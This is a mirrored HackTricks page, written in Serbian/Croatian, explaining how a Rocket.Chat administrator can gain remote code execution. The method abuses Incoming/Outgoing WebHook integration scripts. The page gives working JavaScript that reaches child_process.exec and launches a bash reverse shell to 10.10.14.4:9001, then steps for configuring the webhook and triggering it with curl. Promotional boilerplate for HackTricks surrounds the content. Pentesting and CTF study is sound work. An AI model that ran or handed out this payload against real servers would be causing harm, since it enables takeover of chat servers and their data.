mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
4 KiB
4 KiB
Rocket Chat
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% embed url="https://websec.nl/" %}
RCE
Ako ste admin unutar Rocket Chat-a, možete dobiti RCE.
- Idite na
Integrations
i izaberiteNew Integration
i odaberite bilo koju:Incoming WebHook
iliOutgoing WebHook
. /admin/integrations/incoming
- Prema dokumentaciji, oba koriste ES2015 / ECMAScript 6 (u suštini JavaScript) za obradu podataka. Tako da uzmimo rev shell za javascript kao:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Konfigurišite WebHook (kanal i post kao korisničko ime moraju postojati):
- Konfigurišite WebHook skriptu:
- Sačuvajte promene
- Dobijte generisani WebHook URL:
- Pozovite ga sa curl i trebali biste primiti rev shell
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.